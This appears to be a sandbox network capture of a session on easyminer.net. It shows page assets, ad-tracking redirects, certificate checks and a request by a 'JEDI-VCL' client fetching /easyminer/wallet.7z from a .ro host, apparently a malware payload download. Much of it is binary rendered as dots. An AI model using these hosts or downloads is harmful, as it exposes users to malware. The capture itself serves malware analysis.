.....|.'BD.S.....p.t..dc...w.:qjE.8Y!..>..'.9[.R.J..$5.zb..*q.....J
.jX..E..5mS..}j..r....rO2s..Z7..l.~......._.......}f.Vu....qZ.<Y...
.....`.. ...sJD.. ...G?.m.>>..S/R..a.b.nHQ.......$F.i}....5j....
(.=....O...h.^.D..V6.......,.9cl.;:.h...uY*.J..6K.a....{.j.f...kM.Ae.{
.f*.A.$.....d..j.q.sB.QO..F..Q..1....U..*...u.fK"j.......#....$Ba.#zn`
ES.d....k....X..bk..U....o!A:f<g4...JO|.i.&.Z.R...0g-....cT.o.#.P..
m..'..u:.Y...x...Q6.G">...7ist....QKIDc.)....V.o..n...n.aHa.......3
6g.C."3.....\..4.K.Bl.......:..N....N..c.w].v.......b...).O;%G.1.;<<< skipped >>>

GET /templates/kickstart/img/bg-section-features.jpg HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: easyminer.net

Connection: Keep-Alive

Cookie: INTELLI_90833303d1=9dd599517f1317a5a76366f195a0443d


HTTP/1.1 200 OK

Cache-Control: public, max-age=31536000,public, must-revalidate, proxy-revalidate

Expires: Sat, 21 Jul 2018 15:05:40 GMT

Last-Modified: Mon, 17 Apr 2017 21:12:51 GMT

Content-Type: image/jpeg

Content-Length: 416075

Date: Fri, 21 Jul 2017 15:05:40 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Pragma: public

X-Powered-By: W3 Total Cache/0.9.3

Connection: Keep-Alive

HTTP/1.1 200 OK..Cache-Control: public, max-age=31536000,public, must-
revalidate, proxy-revalidate..Expires: Sat, 21 Jul 2018 15:05:40 GMT..
Last-Modified: Mon, 17 Apr 2017 21:12:51 GMT..Content-Type: image/jpeg
..Content-Length: 416075..Date: Fri, 21 Jul 2017 15:05:40 GMT..Accept-
Ranges: bytes..Server: LiteSpeed..Pragma: public..X-Powered-By: W3 Tot
al Cache/0.9.3..Connection: Keep-Alive........JFIF.............C......
..............................................................C.......
..................................................................l...
.........................................T........................!..1
."AQa..q..#2B...Rbr..$3C....S..4Dc..%s..T..&Ed....5U..................
.................=.....................!..1.AQ..a"2q...B......#3R....b
$C..Sc.............?...-.....G.W.y~.P.w........V..x.........St..mo..)?
.?.....m.....H..jn.O....$?...S.........#.....mo..O....-kG...7.....U.4.
.l?.B....7I..........]..........#....4.m..'..]........?.?.............
.7WG.[..I...........'...R..#inw................@..j..SF5.....?.?...j.m
....'...Su.!..o..)?. R..{....O.......v.?.'.G.U...m....'...UMCM......H.
.j.5.Z...L.....j.D..[....%T.........i.@.c....XW...qah.@.....x3...W...G
..%._...i...<N.uw....t.Y.P......r.p7..~.|......6.Q].4Ze.y..gTF.U<
;.22F...j..t..yb.P...".f{e....W(^y...yx.........?....e..L...A.|.U.f..j
z>..O.3.ka0I.(....g.t"..'.....O.Em.......WH.hz.X.....=5,.z-..h.okwa
......w........l.u..:.'..-$..$...[.@.5..Nq..M.6..[..f.aw.Q...@e.e.'a.s
...F..jz........b.&...$b....sr...v.k.sX..[..4..o....(z.C.a...o....

<<< skipped >>>

GET /pki/crl/products/MicCodSigPCA_08-31-2010.crl HTTP/1.1

Cache-Control: max-age = 900

Connection: Keep-Alive

Accept: */*

If-Modified-Since: Tue, 29 Oct 2013 05:02:50 GMT

If-None-Match: "b8b5df1d64d4ce1:0"

User-Agent: Microsoft-CryptoAPI/6.1

Host: crl.microsoft.com


HTTP/1.1 200 OK

Content-Length: 554

Content-Type: application/pkix-crl

Last-Modified: Thu, 15 Jun 2017 00:43:48 GMT

ETag: 0x8D4B38795FC4CDC

Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0

x-ms-request-id: f9b1299d-0001-000e-1678-e5ab7b000000

x-ms-version: 2009-09-19

x-ms-lease-status: unlocked

x-ms-blob-type: BlockBlob

Date: Fri, 21 Jul 2017 15:06:35 GMT

Connection: keep-alive

0..&0......0...*.H........0y1.0...U....US1.0...U....Washington1.0...U.
...Redmond1.0...U....Micro..

GET /eyeota_user_sync? HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Connection: Keep-Alive

Host: sync.adaptv.advertising.com


HTTP/1.1 302 Found

Content-Type: text/plain

Location: //ps.eyeota.net/match?bid=6bib2cv&uid=EUX6387533831706967011

Server: ribs2.0

Set-Cookie: adaptv_unique_user_cookie="6387533831706967011__TIME__2017-07-21 08:05:52";Path=/;Domain=.adaptv.advertising.com;Expires=Sun, 21-Jul-2019 15:05:52 GMT

Set-Cookie: APID=VB16d0b2b6-6e26-11e7-a9b6-0aa15b2e2d33; Max-Age=31622400; Expires=Sun, 22-Jul-2018 15:05:52 GMT; Domain=.advertising.com; Path=/; Version=1

Content-Length: 0

Connection: keep-alive
HTTP/1.1 302 Found..Content-Type: text/plain..Location: //ps.eyeota.ne
t/match?bid=6bib2cv&uid=EUX6387533831706967011..Server: ribs2.0..Set-C
ookie: adaptv_unique_user_cookie="6387533831706967011__TIME__2017-07-2
1 08:05:52";Path=/;Domain=.adaptv.advertising.com;Expires=Sun, 21-
Jul-2019 15:05:52 GMT..Set-Cookie: APID=VB16d0b2b6-6e26-11e7-a9b6-0aa1
5b2e2d33; Max-Age=31622400; Expires=Sun, 22-Jul-2018 15:05:52 GMT; Dom
ain=.advertising.com; Path=/; Version=1..Content-Length: 0..Connection
: keep-alive..

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69+Aj36pvE8hI6t7jiY7NkyMtQCECsuburZdTZsFIpu26N8jAc= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.comodoca.com


HTTP/1.1 200 OK

Date: Fri, 21 Jul 2017 15:06:08 GMT

Server: Apache

Last-Modified: Wed, 19 Jul 2017 10:05:35 GMT

Expires: Wed, 26 Jul 2017 10:05:35 GMT

ETag: 5256769DFF35BA21C0552D08A1DB95AEF9331C51

Cache-Control: max-age=413366,public,no-transform,must-revalidate

X-OCSP-Reponder-ID: rmdccaocsp31

Content-Length: 727

Connection: close

Content-Type: application/ocsp-response
0..........0..... .....0......0...0........~.=...<....8...22...2017
0719100535Z0s0q0I0... ........^..hl\.....W....r.=.....~.=...<....8.
..22... .n..u6l..n..|......20170719100535Z....20170726100535Z0...*.H..
...........E^......m..Y..|..3.h...v..2..X...?....X....].7.U..`W.O.....
..........U......R.=].I..PbE..YX.0.....)..........ma.>0..4.<*{..
...g..E...h/..Grg&. .iH.S...?D.F.C.T\<..Ug........-d.....T(h[;.n..;
.v!...[.G_.@.......&*c..ZI......*.d.L..B`.|}.|...!.#........Y.r2?.w.H.
..........B.dc.F\...rl)o;..';)...mN.NZ...n..a.....H]5.4.&...j.xK.p..U.
.W...@..;...T5v5.!.B.l..q........!.....nk.../]..%_........1.`.H.......
...U..ngO.y.*.......G.K....... .EU...~.....=.G....x..s..,....a.....X."
...........y.E...H....V......\wSi...........

GET /demconf.jpg?et:ibs|data:dpid=30064&dpuuid=15d65aed1dd-30270000010f1a0b&redir=http://ps.eyeota.net/match?bid=6j5b2cv&uid=${DD_UUID} HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: dpm.demdex.net

Connection: Keep-Alive

Cookie: demdex=00702949223008346980439587358349708598


HTTP/1.1 302 Found

Cache-Control: no-cache,no-store,must-revalidate,max-age=0,proxy-revalidate,no-transform,private

Date: Fri, 21 Jul 2017 15:05:52 GMT

Expires: Thu, 01 Jan 2009 00:00:00 GMT

Location: hXXp://ps.eyeota.net/match?bid=6j5b2cv&uid=00702949223008346980439587358349708598

P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"

Pragma: no-cache

Set-Cookie: demdex=00702949223008346980439587358349708598;Path=/;Domain=.demdex.net;Expires=Wed, 17-Jan-2018 15:05:52 GMT

Set-Cookie: dpm=00702949223008346980439587358349708598;Path=/;Domain=.dpm.demdex.net;Expires=Wed, 17-Jan-2018 15:05:52 GMT

X-TID: hwR8xSApT90=

Content-Length: 0

Connection: keep-alive
HTTP/1.1 302 Found..Cache-Control: no-cache,no-store,must-revalidate,m
ax-age=0,proxy-revalidate,no-transform,private..Date: Fri, 21 Jul 2017
 15:05:52 GMT..Expires: Thu, 01 Jan 2009 00:00:00 GMT..Location: http:
//ps.eyeota.net/match?bid=6j5b2cv&uid=00702949223008346980439587358349
708598..P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa
 PSDa OUR SAMa BUS PUR COM NAV INT"..Pragma: no-cache..Set-Cookie: dem
dex=00702949223008346980439587358349708598;Path=/;Domain=.demdex.net;E
xpires=Wed, 17-Jan-2018 15:05:52 GMT..Set-Cookie: dpm=0070294922300834
6980439587358349708598;Path=/;Domain=.dpm.demdex.net;Expires=Wed, 17-J
an-2018 15:05:52 GMT..X-TID: hwR8xSApT90=..Content-Length: 0..Connecti
on: keep-alive..

GET /easyminer/wallet.7z HTTP/1.1

User-Agent: JEDI-VCL

Host: lotusulalb2.ro

Cache-Control: no-cache


HTTP/1.1 200 OK

Last-Modified: Sun, 12 Mar 2017 18:40:25 GMT

Content-Type: application/x-7z-compressed

Content-Length: 803815

Date: Fri, 21 Jul 2017 15:05:32 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Connection: Keep-Alive
7z..'.....G..C......$........W#...h........D..........=.c.J...g.....bK
.A.B. ..}Leo...@..nd.?G..W.x..~..I[} ^..SQ...GU.|?...[X...N.....?..D..
......-..w...M.....y#`{.m.....a..B.......s.o#..g....mp.Z.-......o.c.O$
-...w..K>..G:.4gT....}...c....zM;.#......N#..g....M.......M m......
......2m..H...Q.V"..E'.W...p..vu...Y]mH.......d....q^.[2.Q.-....B.|.K.
;`?....._?..kN. ^M!.A,....f.6&p..c.Z..f!......]D..E....>....j......
H....<<..Z.V..h..5;'.j....u.7......PQ,...~...6H7'...@.....&L...G
x...._T#.`ydu..G..."'.wsa.....{..Y...........|.n...N...{b.w.......&Q.)
.I..}JZ..r.H....6xO'.R.T r...:..T<.....o\...O...2....s.Q2.S.<...
.0X.\dM..O@..F...m...&uF\....".L......).s$.>...5....x%S.3..'....t..
(...aV..........pm.....d.p...:%....K.:.....rr!....sF..X3'..w#..2..L...
.=....?...@..9lq.,..F....O.F..W"{.C...8.L.1..R.O~....s.M7R...#/.......
.."...1.P.<..I:1`.....^.p.f..s..H#.d...#Y.......W...Cv......ux..'k.
|.....6.Is.W..U...-.......K.!7..\(.5.r..._.@Q......w>..%.n.~fx./.e.
...7.^..[1.......k...I.z.p.>lQ.......;8<.{.A..p....b..Ugo..K...z
ln[...[t%....E^6>....O ..E...}..0D.C.B...Qh.z.g.....|.R..]. .A.2.e.
....Y.!......w...fG,..........[X...o.....dn<........2h.tH[.9.......
..N..........F.......,{nb.l/.......C......a..n..<..(..u..sy..O&>
..6.......aC._..;..*........{...EAB......*"\...X9..p..JdF<.._..(..~
..c"Q..a.40.<.3I..6~....CQ..N.@D......\.....B.....9v.|.a....IC....Q
p/.......8.m..:5...2.....f. .!=....6.|..v>D.... V..fX..|Q..0..].Pz.
.9.......Q...R4n.k....{.|.[.......k%..H....{...`/B.B...}kiR2G.e.o.<<< skipped >>>

GET /templates/kickstart/css/user-style.css?fm=1492463567 HTTP/1.1

Accept: text/css

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: easyminer.net

Connection: Keep-Alive

Cookie: INTELLI_90833303d1=9dd599517f1317a5a76366f195a0443d


HTTP/1.1 200 OK

Cache-Control: public, max-age=31536000,public, must-revalidate, proxy-revalidate

Expires: Sat, 21 Jul 2018 15:05:39 GMT

Last-Modified: Mon, 17 Apr 2017 21:12:47 GMT

Content-Type: text/css

Content-Length: 80

Date: Fri, 21 Jul 2017 15:05:39 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Pragma: public

X-Powered-By: W3 Total Cache/0.9.3

Connection: Keep-Alive

/* .*.* USER STYLES.* This styles will override default styles of temp
late.*.*/.....

GET /js/jquery/jquery.js?fm=1491181282 HTTP/1.1

Accept: application/javascript, */*;q=0.8

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: easyminer.net

Connection: Keep-Alive

Cookie: INTELLI_90833303d1=9dd599517f1317a5a76366f195a0443d


HTTP/1.1 200 OK

Cache-Control: public, max-age=31536000,public, must-revalidate, proxy-revalidate

Expires: Sat, 21 Jul 2018 15:05:39 GMT

Last-Modified: Mon, 03 Apr 2017 01:01:22 GMT

Content-Type: application/x-javascript

Content-Length: 38114

Content-Encoding: gzip

Vary: Accept-Encoding

Date: Fri, 21 Jul 2017 15:05:39 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Pragma: public

X-Powered-By: W3 Total Cache/0.9.3

Connection: Keep-Alive
............m..F...~?...:........B.8.3.N.&.L....h...P.BB..Q...._..4H..
.s.8...l4............~...n.>.;..{.....{[...?.........z6.UE9..>..
......r...?...|...>.....l.j.<.z..G..Y6..A..*/......{.r.m..1)....
....Q...4..).|..5..e...]v58>.....t'.......F........9...,....M......
..^U.....<{......7.o..U>..f..g{...n......z>...o.n..f4XT.c6..e
o...wvO..a.d..do.;....8.~j/...=.[..s..r.............'...O.............
........a....7'.......<:}..S.......{.._..q...N..'..G|........^?..N.
......!%/........z...qO.{..O(9....<zu6.W......h..............Q..G..
..N.v...:_....|9..N...$;...y..Q.^.v.e_...2..........{P....b....y...5..
....F..........g.|..L...3..C.D.....4.r.....h..E5.............=:....w..
.....e.:o...<......!T_.}>.d.f...,.\...Uz}....h|amv;..........yNk
jj.Vh.a..P.7{W..*5....l.,.[.l..*...L..O...u.-...8.n.....E.PI..A!./ v..
...t>.Uf..'Uw......@.|v^].....8.|0<..dy.?......|..{.v.\n........
8.g..l.g3..c..;......E.......F..l...l...h6.e.....O.36.2...].....|.....
/..l. .f.$....g{....Y a..?...{....*_T....7{......}...|\1..Y9...`k...O#
.T...io...3..Y....2 9Lv..y.@.y^......'t..........P......{.d{0....y\.C[
@...Af..?..wI.Z.*...#{....L......?V......?..z.....^...yo8....v../._..6
......,.3.]../G..O...[.p. ..-.;.........5.....p.7.M..9...M.V8T. Cql'.Y
.e....E.6t.l'?.->.Oao./h...V......@g..!...&......@.dU....?....!1I?.
.a.7{z.x.B1O.@I.......,D.a..\...Y]1....;[.z.........w9...\`.sV........
...e..;.@o....(.(_.d...`'........e.&V..tgG..........xvz.?>....U...e
.i...|.5...Y=)... .i....l..[....wz........\]./.E9..'b..i...D?.....<<< skipped >>>

GET /templates/kickstart/js/app.js?fm=1492463572 HTTP/1.1

Accept: application/javascript, */*;q=0.8

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: easyminer.net

Connection: Keep-Alive

Cookie: INTELLI_90833303d1=9dd599517f1317a5a76366f195a0443d


HTTP/1.1 200 OK

Cache-Control: public, max-age=31536000,public, must-revalidate, proxy-revalidate

Expires: Sat, 21 Jul 2018 15:05:40 GMT

Last-Modified: Mon, 17 Apr 2017 21:12:52 GMT

Content-Type: application/x-javascript

Content-Length: 799

Content-Encoding: gzip

Vary: Accept-Encoding

Date: Fri, 21 Jul 2017 15:05:40 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Pragma: public

X-Powered-By: W3 Total Cache/0.9.3

Connection: Keep-Alive
...........U.n.0.<K_A.F%.6....9...z.....hie..I.......K.e.N......;;;
..... '....9... ..n....r...l^..j...v...5./.<._>.YV....`oX.5.S.g.
....;Y=<1-.[a.L6.....W......k=.,;..hcC.......q...]..? k...`..Q..0.@
.Z....7..K.%......`..M...J_t...B.INN_..!.wc&..`2.>Fl............OJ.
}9.}diF'.>?...W.x......;.g/..L1E=..P._...P.%.'. ............. .6.YB
4.</] ...D..~q[......G.a<R..>C.R.`.ke].......u...D...p.c.Nf4.
..<...o.1.bW".D.O`..Ac.........Z..c....y\p.SA........b9i;..i?.y!.H]
l...;.....T..bE.!.wnv...a.6N.0..o.cX]E..p..U..>5......L}.F..]......
.........Y.('.z.... .VyS.g)....jk......%.....?.....P......}.....=.T...
^$!.lrYH...a5..z...%{.}.x..c.x..!..}.....%.I...a.C........n/....o..o..
.....f.........9....S....G....o..!.......%.4....9.h.9..:...4....q..g..
N..'(={........ ....%./..F..p.....B"n.5......Q.. ......G..R....
...


GET /templates/kickstart/img/dot3.png HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: easyminer.net

Connection: Keep-Alive

Cookie: INTELLI_90833303d1=9dd599517f1317a5a76366f195a0443d


HTTP/1.1 200 OK

Cache-Control: public, max-age=31536000,public, must-revalidate, proxy-revalidate

Expires: Sat, 21 Jul 2018 15:05:40 GMT

Last-Modified: Mon, 17 Apr 2017 21:12:51 GMT

Content-Type: image/png

Content-Length: 86

Date: Fri, 21 Jul 2017 15:05:40 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Pragma: public

X-Powered-By: W3 Total Cache/0.9.3

Connection: Keep-Alive

.PNG........IHDR.............V(......IDATx.bd``....@....`..&.$..`.....
.'.<....IEND.B`.HTTP/1.1 200 OK..Cache-Control: public, max-age=315
36000,public, must-revalidate, proxy-revalidate..Expires: Sat, 21 Jul 
2018 15:05:40 GMT..Last-Modified: Mon, 17 Apr 2017 21:12:51 GMT..Conte
nt-Type: image/png..Content-Length: 86..Date: Fri, 21 Jul 2017 15:05:4
0 GMT..Accept-Ranges: bytes..Server: LiteSpeed..Pragma: public..X-Powe
red-By: W3 Total Cache/0.9.3..Connection: Keep-Alive...PNG........IHDR
.............V(......IDATx.bd``....@....`..&.$..`......'.<....IEND.
B`...

GET /match.gif?id=2Zs8eaBuCCVvYgNeWPi-feg-4rhBqXrmhi07KILu_SLQ&partner=eyeota&RED=http://ps.eyeota.net/match?bid=652b2cv&uid= HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: match.rundsp.com

Connection: Keep-Alive


HTTP/1.1 302 Found

Content-Type: image/gif

Cache-Control: no-cache, no-store, must-revalidate, proxy-revalidate

Pragma: no-cache

P3P: CP="Please see RUN's privacy policy at hXXp://VVV.runads.com/privacy-policy"

Expires: 0

Location: hXXp://ps.eyeota.net/match?bid=652b2cv&uid=fca3253dec2b4551ac13309d

Set-Cookie: RUN_ID=fca3253dec2b4551ac13309d; Max-Age=7776000; Expires=Thu, 19 Oct 2017 15:05:57 GMT

content-length: 0

date: Fri, 21 Jul 2017 15:05:57 GMT

HTTP/1.1 302 Found..Content-Type: image/gif..Cache-Control: no-cache, 
no-store, must-revalidate, proxy-revalidate..Pragma: no-cache..P3P: CP
="Please see RUN's privacy policy at hXXp://VVV.runads.com/privacy-pol
icy"..Expires: 0..Location: hXXp://ps.eyeota.net/match?bid=652b2cv&uid
=fca3253dec2b4551ac13309d..Set-Cookie: RUN_ID=fca3253dec2b4551ac13309d
; Max-Age=7776000; Expires=Thu, 19 Oct 2017 15:05:57 GMT..content-leng
th: 0..date: Fri, 21 Jul 2017 15:05:57 GMT..

GET /s/opensans/v14/PRmiXeptR36kaC0GEAetxlRROVH9Vvc8xHnAGvvgPQc.woff HTTP/1.1

Accept: */*

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Origin: hXXp://easyminer.net

Accept-Encoding: gzip, deflate

Host: fonts.gstatic.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Accept-Ranges: bytes

Content-Type: font/woff

Access-Control-Allow-Origin: *

Timing-Allow-Origin: *

Content-Length: 23460

Date: Wed, 14 Jun 2017 16:55:27 GMT

Expires: Thu, 14 Jun 2018 16:55:27 GMT

Last-Modified: Wed, 14 Jun 2017 16:45:44 GMT

X-Content-Type-Options: nosniff

Server: sffe

X-XSS-Protection: 1; mode=block

Cache-Control: public, max-age=31536000

Age: 3190213
wOFF......[.................................GDEF.......(...(....GPOS..
..............GSUB.......X...t.[..OS/2.......Z...`.p..cmap...l........
....cvt ...L...b.....g.ifpgm.............s.ugasp...T............glyf..
.`..H...o...o.head..Q....6...6..{.hhea..Q8...#...$....hmtx..Q\........
..=.loca..T\.........;.#maxp..V.... ... ....name..W........x.P6ppost..
W...........Urprep..Z............................................4...6
.F..................x......P...s..I.....P* ..........<p8....|..O..4
..}... z}..[smkg.......{s.S...[..3..3.;..x.c`f9.......u..1...<.f...
.....................f..C.`g.E..%!6..".-..L.....Ar,q......3.9.....x.}.
%X.a....cqw.E;.k.[.z.A%..^.x............Wf.........d...0.P...c.[P.Au..
....?Wq57p3....I.$H..K..K..&E$.(.@L].~.c...?..`..n.^..P.../.e.......A.
.P]..x7.. @....Y........................#.....t6\.ea..X.*.......lb...M
..H....N..x.c.a.g.c..$KY...e@.,q.........x.........3...........%...=.d
.......#..6.e...L@6.3.e......1._....#...x..TGw.F.........)..)7..W..`*.
j.-...=*'_..sI...2...O>....[tt....TK]..|...G.................^.m..=
..x..q... ./].p....'..k...T.......V..v...|nhp.....&....UE...'.V.&...[.
y..AD....D.Z....P.H...L..Z...tRKg....*.J)...]).|zL... ...Z.C2zh...m...
.....o.c/t1^R,4es.P...PD.......~.:..q....,W. ......1...m...(....XS...&
...b.JgK".=...&......\.....}.>/.?..18"]8......<....1.zk|#.......
...c......#Q..V...D0....M..q.q.K..a.u.tf.0e..J...... ..?\.._.....r....
..=c/ 0..hG....i_............i..McX.:l.....T.l.Za..c..!1.z..)b:=f.=.6.
fB.._....N|)......Z.4a...-...q.D.m.........$...x7......~.[1......0<<< skipped >>>

GET /pixel?google_nid=eye&google_cm&google_sc&bid=gdo9o51&newuser=1 HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: cm.g.doubleclick.net

Connection: Keep-Alive

Cookie: id=2206a0d5d509001b||t=1476353233|et=730|cs=002213fd48e2d5669ef0404555; IDE=AHWqTUlcWb2mFPnBgaR7YetstmfkXAgGb1NF2XG87DnwqAsvzVoh0uw46Q


HTTP/1.1 302 Found

P3P: policyref="hXXp://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"

Location: hXXp://ps.eyeota.net/match?bid=gdo9o51&newuser=1&google_gid=CAESEH0HDPTF3KGEcV-FDyOM0zI&google_cver=1

Date: Fri, 21 Jul 2017 15:05:42 GMT

Pragma: no-cache

Expires: Fri, 01 Jan 1990 00:00:00 GMT

Cache-Control: no-cache, must-revalidate

Content-Type: text/html; charset=UTF-8

Server: HTTP server (unknown)

Content-Length: 310

X-XSS-Protection: 1; mode=block

Set-Cookie: IDE=AHWqTUkXKKTcRMH-UdzcH6udZyX9EdZjNooU_Wrf9kVMx7M6sFAESZcenA; expires=Sat, 13-Oct-2018 10:07:13 GMT; path=/; domain=.doubleclick.net; HttpOnly
<HTML><HEAD><meta http-equiv="content-type" content="te
xt/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HE
AD><BODY>.<H1>302 Moved</H1>.The document has mov
ed.<A HREF="hXXp://ps.eyeota.net/match?bid=gdo9o51&newuser=1&am
p;google_gid=CAESEH0HDPTF3KGEcV-FDyOM0zI&google_cver=1">here<
;/A>...</BODY></HTML>..HTTP/1.1 302 Found..P3P: policyr
ef="hXXp://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa 
ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC N
OI DSP COR"..Location: hXXp://ps.eyeota.net/match?bid=gdo9o51&newuser=
1&google_gid=CAESEH0HDPTF3KGEcV-FDyOM0zI&google_cver=1..Date: Fri, 21 
Jul 2017 15:05:42 GMT..Pragma: no-cache..Expires: Fri, 01 Jan 1990 00:
00:00 GMT..Cache-Control: no-cache, must-revalidate..Content-Type: tex
t/html; charset=UTF-8..Server: HTTP server (unknown)..Content-Length: 
310..X-XSS-Protection: 1; mode=block..Set-Cookie: IDE=AHWqTUkXKKTcRMH-
UdzcH6udZyX9EdZjNooU_Wrf9kVMx7M6sFAESZcenA; expires=Sat, 13-Oct-2018 1
0:07:13 GMT; path=/; domain=.doubleclick.net; HttpOnly..<HTML>&l
t;HEAD><meta http-equiv="content-type" content="text/html;charse
t=utf-8">.<TITLE>302 Moved</TITLE></HEAD><BODY
>.<H1>302 Moved</H1>.The document has moved.<A HREF=
"hXXp://ps.eyeota.net/match?bid=gdo9o51&newuser=1&google_gid=C
AESEH0HDPTF3KGEcV-FDyOM0zI&google_cver=1">here</A>...<
/BODY></HTML>....<<< skipped >>>

GET /pixel/bounce/?pid=ml62m40&t=ajs&uid=2DE7B66B4518725926432CB1022296DF HTTP/1.1

Accept: application/javascript, */*;q=0.8

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ps.eyeota.net

Connection: Keep-Alive

Cookie: mako_uid=15d65aed1dd-30270000010f1a0b


HTTP/1.1 200 OK

Content-Type: application/javascript

Content-Length: 997

Date: Fri, 21 Jul 2017 15:05:42 GMT
(new Image()).src = "http:\/\/cm.g.doubleclick.net\/pixel?google_nid=e
ye&google_cm&google_sc&bid=gdo9o51&newuser=1";(new Image()).src = "htt
p:\/\/ib.adnxs.com\/getuid?http://ps.eyeota.net/match?uid=
$UID&bid=2cr76e1";(new Image()).src = "http:\/\/match.adsrvr.org
\/track\/cmf\/generic?ttd_pid=eyeota&ttd_tpi=1";(new Image()).src = "h
ttp:\/\/sync-tm.everesttech.net\/upi\/pid\/lons7jax?redir=http:/%2
Fps.eyeota.net/match?uid=${TM_USER_ID}&bid=0rijhbu";(n
ew Image()).src = "http:\/\/dmp.adform.net\/serving\/cookie\/match\/?p
arty=1009";function eyeota_callback(){var script=document.createElemen
t("script");script.setAttribute("type","text\/javascript");script.setA
ttribute("async","");script.setAttribute("defer","");script.setAttribu
te("src","http:\/\/ps.eyeota.net\/pixel?e_rc=1&pid=ml62m40&t=ajs&uid=2
DE7B66B4518725926432CB1022296DF");var s = document.getElementsByTagNam
e('script')[0];s.parentNode.insertBefore(script, s);};setTimeout(eyeot
a_callback,5000);HTTP/1.1 200 OK..Content-Type: application/javascript
..Content-Length: 997..Date: Fri, 21 Jul 2017 15:05:42 GMT..(new Image
()).src = "http:\/\/cm.g.doubleclick.net\/pixel?google_nid=eye&google_
cm&google_sc&bid=gdo9o51&newuser=1";(new Image()).src = "http:\/\/ib.a
dnxs.com\/getuid?http://ps.eyeota.net/match?uid=$UID&b
id=2cr76e1";(new Image()).src = "http:\/\/match.adsrvr.org\/track\/c
mf\/generic?ttd_pid=eyeota&ttd_tpi=1";(new Image()).src = "http:\/\/sy
nc-tm.everesttech.net\/upi\/pid\/lons7jax?redir=http://ps.ey<<< skipped >>>

GET /match?uid=5968840930698789580&bid=9gdtmu1 HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ps.eyeota.net

Connection: Keep-Alive

Cookie: mako_uid=15d65aed1dd-30270000010f1a0b


HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 70

Date: Fri, 21 Jul 2017 15:05:42 GMT

GIF89a...................!..NETSCAPE2.0.....!.......,................;
....

GET /match?uid=WXIYRgAAAGbcCHPP&bid=0rijhbu HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ps.eyeota.net

Connection: Keep-Alive

Cookie: mako_uid=15d65aed1dd-30270000010f1a0b


HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 70

Date: Fri, 21 Jul 2017 15:05:42 GMT

GIF89a...................!..NETSCAPE2.0.....!.......,................;
